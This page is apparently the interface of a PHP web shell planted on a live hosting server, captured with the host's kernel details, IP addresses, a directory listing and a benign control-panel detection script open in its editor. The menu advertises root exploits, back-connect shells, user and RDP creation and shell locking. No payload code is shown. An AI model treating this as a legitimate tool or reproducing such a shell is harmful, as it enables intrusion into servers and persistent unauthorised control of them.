Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.118
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-php-config /
[ HOME SHELL ]
Name
Size
Permission
Action
alt-php-panel-configuration.py
8.54
KB
-rwxr-xr-x
alt-php-panel-configuration.py...
8.47
KB
-rw-r--r--
alt-php-panel-configuration.py...
8.47
KB
-rw-r--r--
alt-php.cfg
276
B
-rwxr-xr-x
detectcp.py
690
B
-rwxr-xr-x
detectcp.pyc
740
B
-rw-r--r--
detectcp.pyo
740
B
-rw-r--r--
install_odbc
526
B
-rwxr-xr-x
multiphp_reconfigure.py
7.7
KB
-rwxr-xr-x
multiphp_reconfigure.pyc
7.94
KB
-rw-r--r--
multiphp_reconfigure.pyo
7.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : detectcp.py
#!/usr/bin/env python # -*- mode:python; coding:utf-8; -*- import os def getCPName(): # cPanel if os.path.isfile('/usr/local/cpanel/cpanel'): return "cPanel" # DirectAdmin if os.path.isfile('/usr/local/directadmin/directadmin') or \ os.path.isfile('/usr/local/directadmin/custombuild/build'): return "DirectAdmin" # InterWorx if os.path.isfile('/usr/local/interworx/iworx.ini'): return "InterWorx" # ISPManager if os.path.isfile('/usr/local/ispmgr/bin/ispmgr'): return "ISPManager" # Plesk if os.path.isfile('/usr/local/psa/version'): return "Plesk" # Unknown panel / No panel return "Unknown"
Close